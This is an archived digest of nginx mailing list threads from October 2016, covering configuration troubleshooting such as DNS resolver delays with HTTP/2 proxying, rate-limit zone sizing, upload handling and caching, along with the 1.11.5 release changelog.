From nginx-forum at forum.nginx.org Mon Oct 10 08:29:27 2016 From: nginx-forum at forum.nginx.org (mrast) Date: Mon, 10 Oct 2016 04:29:27 -0400 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: <20161009194134.GX11677@daoine.org> References: <20161009194134.GX11677@daoine.org> Message-ID:

Hi Francis,

Wow, this gets stranger... you have cracked it for me... but I have no idea how or why it got there!

There were symlinks in website1.com's and website3.com's public root directories for phpmyadmin - symlinked to /usr/share/phpmyadmin. I never noticed them, though, as they didn't appear as folders when browsing the public folder structure with an FTP program. Only doing an ls on /website1.com/public showed them.

I removed the symlink to /usr/share/phpmyadmin in the 2 root folders, and now I get a 404 page when navigating to /phpmyadmin... Perfect! :-)

As you can probably tell, I'm primarily a Windows admin and my Linux knowledge is limited; thanks to people like yourself, though, I'm learning!

PS - index.php does exist in the public root folders - but the file belongs to WordPress.

PPS - You say:

> if ($http_cookie ~* ?PHPSESSID"){
>If that is a copy-paste of the config file, then it probably won't match
>some things that you would want it to.

Could you elaborate on this please, if you have time?

Thank you for your time and help, Francis; it's most appreciated.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270105,270146#msg-270146

From nginx-forum at forum.nginx.org Mon Oct 10 09:29:45 2016 From: nginx-forum at forum.nginx.org (bobykus) Date: Mon, 10 Oct 2016 05:29:45 -0400 Subject: mail-proxy starttls and ssl on Message-ID: <6e552de247b17a8327e0d1452a1c7978.NginxMailingListEnglish@forum.nginx.org>

The manual "Setting up SSL/TLS for a Mail Proxy" https://www.nginx.com/resources/admin-guide/mail-proxy/ says:

Enable SSL/TLS for mail proxy with the ssl directive. If the directive is specified in the mail context, SSL/TLS will be enabled for all mail proxy servers. You can also enable STLS and STARTTLS with the starttls directive:

mail {
    ...
    ssl on;
    starttls on;
    ...
}

However, if I add both:

nginx: [warn] "ssl" directive conflicts with "starttls" in /root/nginx.conf:79
nginx: configuration file /root/nginx.conf test failed

How come?

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270147,270147#msg-270147

From chris.west at logicalglue.com Mon Oct 10 11:34:18 2016 From: chris.west at logicalglue.com (Chris West) Date: Mon, 10 Oct 2016 12:34:18 +0100 Subject: 5s hangs with http2 and variable-based proxy_pass Message-ID:

If you enable http2, our proxy setup develops 5s hangs, under load. This happens from at least Chrome/linux, Firefox/linux and Edge/win10.

Any suggestions on how to further diagnose this problem, or work out where this "5 second" number is coming from? Full reproduction config and debug logs are attached, but I don't understand the debug logs.

This isn't always reproducible, but happens frequently. Changing browser, restarting nginx, ... doesn't cause it to be immediately reproducible.

The proxying is based on a variable:

resolver 8.8.4.4;
location ~/proxy/([a-z-]+\.example\.com)$ {
    proxy_pass https://$1/foo;
    ...

This is easiest to see when a number of these urls are hit from a single page, e.g. ... etc.
The observed effect is that exactly eight requests will be serviced, then there will be a 5s wait, then another eight will be serviced, then hang, etc. until all requests have been serviced. Reproduced on Ubuntu 16.04's nginx packages (1.10 based), with default config, and this sites-enabled/default full config: server { listen 443 default_server ssl http2; ssl on; ssl_certificate /etc/letsencrypt/live/.../fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/.../privkey.pem; root /var/www/html; index index.html index.htm; server_name _; location / { try_files $uri $uri/ =404; } resolver 8.8.4.4; location ~/proxy/([a-z-]+\....)$ { proxy_pass https://$1/index.txt; proxy_http_version 1.1; proxy_connect_timeout 13s; proxy_read_timeout 28s; } } The 5s pause is evident in the debug log. However, the debug log *also* shows that the upstream requests have been generated, which means that all the requests have been received. Pause: 2016/10/10 11:17:31 [debug] 4058#4058: *238 process http2 frame type:3 f:0 l:4 sid:17 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 RST_STREAM frame, sid:17 status:8 2016/10/10 11:17:31 [debug] 4058#4058: *238 unknown http2 stream 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete pos:00007F536315501D end:00007F536315501D 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 read handler 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_read: 13 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_read: -1 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_get_error: 2 2016/10/10 11:17:31 [debug] 4058#4058: *238 process http2 frame type:3 f:0 l:4 sid:13 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 RST_STREAM frame, sid:13 status:8 2016/10/10 11:17:31 [debug] 4058#4058: *238 unknown http2 stream 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete pos:00007F536315501D end:00007F536315501D 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 read handler 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_read: 13 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_read: -1 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_get_error: 2 2016/10/10 11:17:31 [debug] 4058#4058: *238 process http2 frame type:3 f:0 l:4 sid:5 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 RST_STREAM frame, sid:5 status:8 2016/10/10 11:17:31 [debug] 4058#4058: *238 unknown http2 stream 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete pos:00007F536315501D end:00007F536315501D 2016/10/10 11:17:36 [debug] 4058#4058: *238 http upstream resolve: "/proxy/nettesto....?" 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to 94.23.43.98 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to 2001:41d0:2:2c62:: 2016/10/10 11:17:36 [debug] 4058#4058: *238 posix_memalign: 000055B45897FDB0:4096 @16 2016/10/10 11:17:36 [debug] 4058#4058: *238 get rr peer, try: 2 2016/10/10 11:17:36 [debug] 4058#4058: *238 get rr peer, current: 000055B45897FE18 -1 2016/10/10 11:17:36 [debug] 4058#4058: *238 stream socket 12 Upstream requsets: 2016/10/10 11:17:31 [debug] 4058#4058: *238 http proxy header: "GET /index.txt HTTP/1.1^M Host: nettestz.fau...^M But they're not served by the backend until much later, at [10/Oct/2016:11:17:46 +0000] in this case (according to the backend's nginx access logs). The host names mentioned in the debug log are public and are valid until I pull them down, but I don't know if this is reproducible with multiple people accessing it (and you can probably guess why I stripped them from the email body). 
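For what it's worth, the 5-second figure matches the nginx resolver's retransmission interval: an unanswered UDP query is re-sent after roughly 5 seconds, so a batch of lost DNS responses shows up as a 5s stall. A local caching resolver in front of nginx, plus caching of the answers, avoids sending a burst of identical queries to a public server -- a minimal sketch, assuming a caching daemon such as dnsmasq is listening on 127.0.0.1:

resolver 127.0.0.1 valid=300s;   # cache resolved names for 5 minutes, overriding the record TTL
resolver_timeout 10s;            # overall budget for a name lookup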
-------------- next part -------------- A non-text attachment was scrubbed... Name: debug.log.gz Type: application/x-gzip Size: 15622 bytes Desc: not available URL: From vbart at nginx.com Mon Oct 10 11:58:36 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Mon, 10 Oct 2016 14:58:36 +0300 Subject: 5s hangs with http2 and variable-based proxy_pass In-Reply-To: References: Message-ID: <8585362.MJTgDEinSn@vbart-workstation> On Monday 10 October 2016 12:34:18 Chris West wrote: > If you enable http2, our proxy setup develops 5s hangs, under load. > This happens from at least Chrome/linux, Firefox/linux and Edge/win10. > > Any suggestions on how to further diagnose this problem, or work out > where this "5 second" number is coming from? Full reproduction config > and debug logs are attached, but I don't understand the debug logs. > > > This isn't always reproducible, but happens frequently. Changing > browser, restarting nginx, ... doesn't cause it to be immediately > reproducible. > [..] > 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete > pos:00007F536315501D end:00007F536315501D > 2016/10/10 11:17:36 [debug] 4058#4058: *238 http upstream resolve: > "/proxy/nettesto....?" > 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to 94.23.43.98 > 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to > 2001:41d0:2:2c62:: [..] Looks like the delay is created by your resolver (8.8.4.4 as set in your configuration). Please, also check the documentation and don't use any public DNS in the resolver directive: http://nginx.org/en/docs/http/ngx_http_core_module.html#resolver | To prevent DNS spoofing, it is recommended configuring DNS servers in a properly | secured trusted local network. wbr, Valentin V. Bartenev From chris.west at logicalglue.com Mon Oct 10 12:30:38 2016 From: chris.west at logicalglue.com (Chris West) Date: Mon, 10 Oct 2016 13:30:38 +0100 Subject: 5s hangs with http2 and variable-based proxy_pass In-Reply-To: <8585362.MJTgDEinSn@vbart-workstation> References: <8585362.MJTgDEinSn@vbart-workstation> Message-ID: You are correct, the DNS server (Google Public DNS) isn't responding to the requests. I don't know if this is because the UDP packets are getting lost due to the flood generated, or if it thinks it's an attack. Ramming dnsmasq in the middle fixes it, but I don't really understand why, as the test only generates 26*2=52 requests, and dnsmasq is supposed to have a default concurrency of 150. Both generate, as far as I can see, identical dns packets. dnsmasq takes about 200ms to transmit them, whereas nginx only takes about 30ms, maybe that's sufficient. At least this isn't something scarily wrong with the http2 support, which was what was worrying me. Cheers! On 10 October 2016 at 12:58, Valentin V. Bartenev wrote: > On Monday 10 October 2016 12:34:18 Chris West wrote: >> If you enable http2, our proxy setup develops 5s hangs, under load. >> This happens from at least Chrome/linux, Firefox/linux and Edge/win10. >> >> Any suggestions on how to further diagnose this problem, or work out >> where this "5 second" number is coming from? Full reproduction config >> and debug logs are attached, but I don't understand the debug logs. >> >> >> This isn't always reproducible, but happens frequently. Changing >> browser, restarting nginx, ... doesn't cause it to be immediately >> reproducible. >> > [..] 
>> 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete >> pos:00007F536315501D end:00007F536315501D >> 2016/10/10 11:17:36 [debug] 4058#4058: *238 http upstream resolve: >> "/proxy/nettesto....?" >> 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to 94.23.43.98 >> 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to >> 2001:41d0:2:2c62:: > [..] > > > Looks like the delay is created by your resolver (8.8.4.4 as set in your configuration). > Please, also check the documentation and don't use any public DNS in the resolver > directive: http://nginx.org/en/docs/http/ngx_http_core_module.html#resolver > > | To prevent DNS spoofing, it is recommended configuring DNS servers in a properly > | secured trusted local network. > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From francis at daoine.org Mon Oct 10 16:10:17 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 10 Oct 2016 17:10:17 +0100 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: References: <20161009194134.GX11677@daoine.org> Message-ID: <20161010161017.GA11677@daoine.org> On Mon, Oct 10, 2016 at 04:29:27AM -0400, mrast wrote: Hi there, > there were symlinks in website1.com and website3.com roots public > directories for phpmyadmin - symlinked to /usr/share/phpmyadmin. It's good that you found an answer that works for you. > > if ($http_cookie ~* ?PHPSESSID"){ > >If that is a copy-paste of the config file, then it probably won't match > >some things that you would want it to. > > Could you elaborate on this please if you have time? ? is not " You probably want "PHPSESSID", like in the other server block. All the best, f -- Francis Daly francis at daoine.org From francis at daoine.org Mon Oct 10 16:16:22 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 10 Oct 2016 17:16:22 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: References: <20161009160507.GW11677@daoine.org> Message-ID: <20161010161622.GB11677@daoine.org> On Mon, Oct 10, 2016 at 03:41:13AM -0400, yurai wrote: Hi there, > thank you for response. I just want to transfer big file on Nginx server > inside POST request. I use method from: > https://coderwall.com/p/swgfvw/nginx-direct-file-upload-without-passing-them-through-backend > > Whole my analysis and expectations are based on this article. I think that at least one of us is confused. You have "client" - "nginx" - "backend". That document is about getting a file from "client" to "nginx", and then telling "backend" what filename is used on "nginx". If "backend" wants to access the file, that is out of the scope of that document. ("backend" gets the filename, and should presumably do a separate "open" on the shared filesystem, or have a separate transfer to be able to read the file.) > Unfotunately this "clientbodyinfileonly" functionality is not well > documented so I'm not sure how exactly ok scenario from Nginx POV should > look like. I just know that my file is not transfered and not saved on > server side. The file should be transferred to the nginx server. If that happens, the nginx side is doing what it was configured to do. 
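For reference, a minimal shape of that setup, assuming the same client/nginx/backend split as in the article (the location, path, and upstream name here are illustrative, not the poster's exact config), is:

location = /upload {
    client_body_in_file_only on;
    client_body_temp_path /tmp/nginx-client-body;

    # hand the backend the local filename instead of the body itself
    proxy_set_header X-FILE $request_body_file;
    proxy_pass_request_body off;
    proxy_set_header Content-Length "";

    proxy_pass http://backend;
}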
The functionality is documented at http://nginx.org/r/client_body_in_file_only

Cheers, f -- Francis Daly francis at daoine.org

From dmiller at amfes.com Mon Oct 10 17:19:55 2016 From: dmiller at amfes.com (Daniel Miller) Date: Mon, 10 Oct 2016 10:19:55 -0700 Subject: invalid url - my config or invalid request? Message-ID: My site is generally doing exactly what I want. Periodically I'll see some errors in the log. I'm trying to determine if these indicate problems in my config, or potential attacks, or simply a broken client.

The last few lines in my log:

2016/10/05 14:38:37 [error] 17912#0: *17824 invalid url, client: 195.154.181.113, server: amfes.com, request: "HEAD /robots.txt HTTP/1.0"
2016/10/05 19:47:27 [error] 17912#0: *18315 invalid url, client: 169.56.71.56, server: amfes.com, request: "GET / HTTP/1.0"
2016/10/08 13:46:21 [error] 17910#0: *27413 invalid url, client: 212.83.162.138, server: amfes.com, request: "HEAD /robots.txt HTTP/1.0"
2016/10/09 18:05:30 [error] 17912#0: *32588 invalid url, client: 211.1.156.90, server: amfes.com, request: "HEAD / HTTP/1.0"

Clients I control have no problem reaching the root or the robots.txt file - so what is this telling me? -- Daniel

From vbart at nginx.com Mon Oct 10 17:43:08 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Mon, 10 Oct 2016 20:43:08 +0300 Subject: invalid url - my config or invalid request? In-Reply-To: References: Message-ID: <2136505.JouzbVE9h5@vbart-workstation> On Monday 10 October 2016 10:19:55 Daniel Miller wrote: > My site is generally doing exactly what I want. Periodically I'll see > some errors in the log. I'm trying to determine if these indicate > problems in my config, or potential attacks, or simply a broken client. > > The last few lines in my log: > 2016/10/05 14:38:37 [error] 17912#0: *17824 invalid url, client: > 195.154.181.113, server: amfes.com, request: "HEAD /robots.txt HTTP/1.0" > 2016/10/05 19:47:27 [error] 17912#0: *18315 invalid url, client: > 169.56.71.56, server: amfes.com, request: "GET / HTTP/1.0" > 2016/10/08 13:46:21 [error] 17910#0: *27413 invalid url, client: > 212.83.162.138, server: amfes.com, request: "HEAD /robots.txt HTTP/1.0" > 2016/10/09 18:05:30 [error] 17912#0: *32588 invalid url, client: > 211.1.156.90, server: amfes.com, request: "HEAD / HTTP/1.0" > > Clients I control have no problem reaching the root or the robots.txt > file - so what is this telling me? > The official nginx build cannot produce such messages. They likely come from a 3rd-party module or patches you're using. wbr, Valentin V. Bartenev

From nginx-forum at forum.nginx.org Mon Oct 10 19:14:33 2016 From: nginx-forum at forum.nginx.org (gg4u) Date: Mon, 10 Oct 2016 15:14:33 -0400 Subject: cache all endpoints but one: nginx settings In-Reply-To: <20161004162825.GM73038@mdounin.ru> References: <20161004162825.GM73038@mdounin.ru> Message-ID: <30c5aa0d4b5d2f7241d7f5b923c90f51.NginxMailingListEnglish@forum.nginx.org> thank you Maxim, I'll try with your suggestions. So basically, if I have a "production" server and a proxy server in front of it, I just need cache on the proxy server (http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_valid), and not cache responses on the production server? I have this setting on the production server:

# Set Cache for my Json api
location ~* \.(?:json)$ {
    expires 1M;
    access_log off;
    add_header Cache-Control "public";
}

But if I am using a proxy server it is useless, correct?
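For illustration, a minimal front-proxy cache along those lines could look like the sketch below (proxy_cache_path sits at http level; the zone name, cache path, and upstream are hypothetical):

proxy_cache_path /var/cache/nginx/api keys_zone=api:10m max_size=1g inactive=60m;

location /api/ {
    proxy_cache api;
    proxy_cache_valid 200 1h;

    # expose the cache status while testing
    add_header X-Proxy-Cache $upstream_cache_status;

    proxy_pass http://production;
}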
Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270058,270167#msg-270167

From nginx-forum at forum.nginx.org Mon Oct 10 19:34:50 2016 From: nginx-forum at forum.nginx.org (gg4u) Date: Mon, 10 Oct 2016 15:34:50 -0400 Subject: cache all endpoints but one: nginx settings In-Reply-To: <30c5aa0d4b5d2f7241d7f5b923c90f51.NginxMailingListEnglish@forum.nginx.org> References: <20161004162825.GM73038@mdounin.ru> <30c5aa0d4b5d2f7241d7f5b923c90f51.NginxMailingListEnglish@forum.nginx.org> Message-ID: <7abc6b22246e2e63b9408b56e7ad27bf.NginxMailingListEnglish@forum.nginx.org> Update about FLASK: as you indicated in: I am using the errorhandler decorator, but returning a template in the handler function:

@application.errorhandler(404)
def error_404(e):
    application.logger.error('Page Not Found: %s', (request.path))
    #return render_template('404.html'), 404
    return render_template("404.html", error = str(e))

In this situation, it is not clear to me whether nginx will read a 200 response (since the template 404.html is actually found) or the 404 error, handled by the decorator. Actually, with the suggestions from: http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_valid I can see:

/api/_invalidpage returned the header: X-Proxy-Cache: MISS and it is not cached now.
while /_invalidpage/ (the page a user will see for that specific page) returned X-Proxy-Cache: HIT

I would like to cache the html template but not the 404 api response. I think it is now correct, but I would appreciate a clarification on how a template is handled inside the error handler in Flask, to better understand how things work.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270058,270168#msg-270168

From darbas.mindaugas at gmail.com Tue Oct 11 11:26:50 2016 From: darbas.mindaugas at gmail.com (=?UTF-8?Q?Mindaugas_Bernatavi=C4=8Dius?=) Date: Tue, 11 Oct 2016 11:26:50 +0000 Subject: Rate limiting zone size question Message-ID: Greetings group, I have posted the same questions elsewhere, hope it's not against the policy. One of the modules that is often employed, ngx_http_limit_req_module, has the following precaution in the documentation: "If the zone storage is exhausted, the server will return the 503 (Service Temporarily Unavailable) error to all further requests."

Questions:
----------------------------------------------------------------------
1. It is interesting to me how the zone is defined. I know that the underlying data structure is a red-black tree. But what comprises the entire zone record? All the information needed for the rate limit?
2. I have multiple users on the website served by nginx, and the zone size is 1m. How do I determine the lower bound of the zone for a given unique IP count?
3. After what time is the zone memory released? If I have rate=1r/m, does that mean that all the records will have to be kept for 1 minute to do the accounting, then cleared so that memory in the zone could be renewed?

Some code considerations:
----------------------------------------------------------------------
Looking at ngx_http_limit_req_module.c, I saw only a configure-time error being thrown when the zone size is specified incorrectly:

if (size < (ssize_t) (8 * ngx_pagesize)) {
    ngx_conf_log_error(NGX_LOG_EMERG, cf, 0, "zone \"%V\" is too small", &value[i]);
    return NGX_CONF_ERROR;
}

(8 * ngx_pagesize), if I'm not mistaken, is 8 * 4096 = 32768. I confirmed experimentally that the smallest size is indeed 32768 bytes = 32KB.
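A quick way to reproduce that check is a deliberately undersized zone (the zone name here is arbitrary):

limit_req_zone $binary_remote_addr zone=tiny:16k rate=1r/m;

With this in place, "nginx -t" refuses the configuration at load time with a message along the lines of: nginx: [emerg] zone "tiny" is too small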
----------------------------------------------------------------------
The function contains some interesting data:

static ngx_int_t ngx_http_limit_req_lookup(ngx_http_limit_req_limit_t *limit,
    ngx_uint_t hash, ngx_str_t *key, ngx_uint_t *ep, ngx_uint_t account)

    node = ngx_slab_alloc_locked(ctx->shpool, size);

    if (node == NULL) {
        ngx_log_error(NGX_LOG_ALERT, ngx_cycle->log, 0,
                      "could not allocate node%s", ctx->shpool->log_ctx);
        return NGX_ERROR;
    }

I suppose this is the error thrown when the zone size limit is reached? Would really appreciate your help on this issue.
----------------------------------------------------------------------
Also, I calculated the size of each node of the rb tree and it seems to comprise only 44 bytes:

struct ngx_rbtree_node_s {
    ngx_rbtree_key_t      key;     ===> 4 bytes
    ngx_rbtree_node_t    *left;    ===> 8 bytes (pointer size on 64bit)
    ngx_rbtree_node_t    *right;   ===> 8
    ngx_rbtree_node_t    *parent;  ===> 8
    u_char                color;   ===> 8
    u_char                data;    ===> 8
};

-------------- next part -------------- An HTML attachment was scrubbed... URL:

From mdounin at mdounin.ru Tue Oct 11 15:32:34 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 11 Oct 2016 18:32:34 +0300 Subject: nginx-1.11.5 Message-ID: <20161011153234.GC73038@mdounin.ru>

Changes with nginx 1.11.5                                        11 Oct 2016

*) Change: the --with-ipv6 configure option was removed, now IPv6 support is configured automatically.
*) Change: now if there are no available servers in an upstream, nginx will not reset the number of failures of all servers as it previously did, but will wait for fail_timeout to expire.
*) Feature: the ngx_stream_ssl_preread_module.
*) Feature: the "server" directive in the "upstream" context supports the "max_conns" parameter.
*) Feature: the --with-compat configure option.
*) Feature: "manager_files", "manager_threshold", and "manager_sleep" parameters of the "proxy_cache_path", "fastcgi_cache_path", "scgi_cache_path", and "uwsgi_cache_path" directives.
*) Bugfix: flags passed by the --with-ld-opt configure option were not used while building the perl module.
*) Bugfix: in the "add_after_body" directive when used with the "sub_filter" directive.
*) Bugfix: in the $realip_remote_addr variable.
*) Bugfix: the "dav_access", "proxy_store_access", "fastcgi_store_access", "scgi_store_access", and "uwsgi_store_access" directives ignored permissions specified for user.
*) Bugfix: unix domain listen sockets might not be inherited during binary upgrade on Linux.
*) Bugfix: nginx returned the 400 response on requests with the "-" character in the HTTP method.

-- Maxim Dounin http://nginx.org/

From kworthington at gmail.com Tue Oct 11 17:23:33 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 11 Oct 2016 13:23:33 -0400 Subject: [nginx-announce] nginx-1.11.5 In-Reply-To: <20161011153240.GD73038@mdounin.ru> References: <20161011153240.GD73038@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.11.5 for Windows https://kevinworthington.com/nginxwin1115 (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org.
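As a side note on one of the features in the changelog above: per that entry, the "server" directive in an "upstream" block now accepts "max_conns" in the open source version, for example (the addresses and the limit are made-up values):

upstream backend {
    server 192.0.2.10:8080 max_conns=100;
    server 192.0.2.11:8080 max_conns=100;
}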
Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Oct 11, 2016 at 11:32 AM, Maxim Dounin wrote: > Changes with nginx 1.11.5 11 Oct > 2016 > > *) Change: the --with-ipv6 configure option was removed, now IPv6 > support is configured automatically. > > *) Change: now if there are no available servers in an upstream, nginx > will not reset number of failures of all servers as it previously > did, but will wait for fail_timeout to expire. > > *) Feature: the ngx_stream_ssl_preread_module. > > *) Feature: the "server" directive in the "upstream" context supports > the "max_conns" parameter. > > *) Feature: the --with-compat configure option. > > *) Feature: "manager_files", "manager_threshold", and "manager_sleep" > parameters of the "proxy_cache_path", "fastcgi_cache_path", > "scgi_cache_path", and "uwsgi_cache_path" directives. > > *) Bugfix: flags passed by the --with-ld-opt configure option were not > used while building perl module. > > *) Bugfix: in the "add_after_body" directive when used with the > "sub_filter" directive. > > *) Bugfix: in the $realip_remote_addr variable. > > *) Bugfix: the "dav_access", "proxy_store_access", > "fastcgi_store_access", "scgi_store_access", and > "uwsgi_store_access" > directives ignored permissions specified for user. > > *) Bugfix: unix domain listen sockets might not be inherited during > binary upgrade on Linux. > > *) Bugfix: nginx returned the 400 response on requests with the "-" > character in the HTTP method. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From alex at samad.com.au Wed Oct 12 01:43:12 2016 From: alex at samad.com.au (Alex Samad) Date: Wed, 12 Oct 2016 12:43:12 +1100 Subject: newbie question Message-ID: Hi I am trying to create a dynamic auth address # grab ssoid map $cookie_SSOID $ssoid_cookie { default ""; ~SSOID=(?P.+) $ssoid; } location /imaadmin/ { proxy_cache off; proxy_pass http://IMAAdmin; auth_request /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; what I am trying to do is fill the variable ssoid_cookie with the cookie value for SSOID in the request or make it blank then when somebody tries to access /imaadmin make the auth request /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; but i get this GET /sso/validate%3FSSOID=$ssoid_cookie&a=imaadmin HTTP/1.0 Alex From anoopalias01 at gmail.com Wed Oct 12 09:33:29 2016 From: anoopalias01 at gmail.com (Anoop Alias) Date: Wed, 12 Oct 2016 15:03:29 +0530 Subject: [nginx-announce] nginx-1.11.5 In-Reply-To: References: <20161011153240.GD73038@mdounin.ru> Message-ID: *) Feature: the --with-compat configure option. What does this do actually? On Tue, Oct 11, 2016 at 10:53 PM, Kevin Worthington wrote: > Hello Nginx users, > > Now available: Nginx 1.11.5 for Windows https://kevinworthington.com/ > nginxwin1115 (32-bit and 64-bit versions) > > These versions are to support legacy users who are already using Cygwin > based builds of Nginx. Officially supported native Windows binaries are > at nginx.org. 
> > Announcements are also available here: > Twitter http://twitter.com/kworthington > Google+ https://plus.google.com/+KevinWorthington/ > > Thank you, > Kevin > -- > Kevin Worthington > kworthington *@* (gmail] [dot} {com) > http://kevinworthington.com/ > http://twitter.com/kworthington > https://plus.google.com/+KevinWorthington/ > > On Tue, Oct 11, 2016 at 11:32 AM, Maxim Dounin wrote: > >> Changes with nginx 1.11.5 11 Oct >> 2016 >> >> *) Change: the --with-ipv6 configure option was removed, now IPv6 >> support is configured automatically. >> >> *) Change: now if there are no available servers in an upstream, nginx >> will not reset number of failures of all servers as it previously >> did, but will wait for fail_timeout to expire. >> >> *) Feature: the ngx_stream_ssl_preread_module. >> >> *) Feature: the "server" directive in the "upstream" context supports >> the "max_conns" parameter. >> >> *) Feature: the --with-compat configure option. >> >> *) Feature: "manager_files", "manager_threshold", and "manager_sleep" >> parameters of the "proxy_cache_path", "fastcgi_cache_path", >> "scgi_cache_path", and "uwsgi_cache_path" directives. >> >> *) Bugfix: flags passed by the --with-ld-opt configure option were not >> used while building perl module. >> >> *) Bugfix: in the "add_after_body" directive when used with the >> "sub_filter" directive. >> >> *) Bugfix: in the $realip_remote_addr variable. >> >> *) Bugfix: the "dav_access", "proxy_store_access", >> "fastcgi_store_access", "scgi_store_access", and >> "uwsgi_store_access" >> directives ignored permissions specified for user. >> >> *) Bugfix: unix domain listen sockets might not be inherited during >> binary upgrade on Linux. >> >> *) Bugfix: nginx returned the 400 response on requests with the "-" >> character in the HTTP method. >> >> >> -- >> Maxim Dounin >> http://nginx.org/ >> >> _______________________________________________ >> nginx-announce mailing list >> nginx-announce at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx-announce >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- *Anoop P Alias* -------------- next part -------------- An HTML attachment was scrubbed... URL: From mat999 at gmail.com Wed Oct 12 10:01:24 2016 From: mat999 at gmail.com (Mathew Heard) Date: Wed, 12 Oct 2016 21:01:24 +1100 Subject: CAP_NET_ADMIN Message-ID: Hi All, I am stuck trying to get my nginx service which is launched via SystemD to give CAP_NET_ADMIN to its workers (required for IP_TRANSPARENT). I have tried /etc/security/capability.conf & setcap. SystemD has the permission whitelisted: CapabilityBoundingSet=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SYS_RESOURCE CAP_SETGID CAP_SETUID AmbientCapabilities=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SYS_RESOURCE CAP_SETGID CAP_SETUID Any advice? Regards, Mathew From mat999 at gmail.com Wed Oct 12 10:07:58 2016 From: mat999 at gmail.com (Mathew Heard) Date: Wed, 12 Oct 2016 21:07:58 +1100 Subject: Fwd: CAP_NET_ADMIN In-Reply-To: References: Message-ID: I have also tried: InheritableCapabilities=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SETGID CAP_SETUID CAP_SYS_RESOURCE and various other options without avail. ---------- Forwarded message ---------- From: Mathew Heard Date: Wed, Oct 12, 2016 at 9:01 PM Subject: CAP_NET_ADMIN To: nginx at nginx.org Hi All, I am stuck trying to get my nginx service which is launched via SystemD to give CAP_NET_ADMIN to its workers (required for IP_TRANSPARENT). 
I have tried /etc/security/capability.conf & setcap. SystemD has the permission whitelisted:

CapabilityBoundingSet=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SYS_RESOURCE CAP_SETGID CAP_SETUID
AmbientCapabilities=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SYS_RESOURCE CAP_SETGID CAP_SETUID

Any advice? Regards, Mathew

From nginx-forum at forum.nginx.org Wed Oct 12 10:28:47 2016 From: nginx-forum at forum.nginx.org (yurai) Date: Wed, 12 Oct 2016 06:28:47 -0400 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <20161010161622.GB11677@daoine.org> References: <20161010161622.GB11677@daoine.org> Message-ID: <216fd4b10237c6458f868f35d5a7f2ac.NginxMailingListEnglish@forum.nginx.org> Hello, >"The file should be transferred to the nginx server." This is the whole point. With the current configuration, when I type curl --data-binary '@upload.txt' http://localhost/upload the file is NOT transferred from client to server at all - "proxy_pass" is performed and I only get HTTP response 200. When I change my configuration (by removing the whole backend configuration (s2 block) and all proxy_* directives from s1) and type the same command, I get HTTP 405 Not Allowed or HTTP 301 Moved Permanently. Let's set aside the size of the file body for a second. Maybe at this point the right question is: what should I do to make my above curl command work? Regards, Dawid

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270196#msg-270196

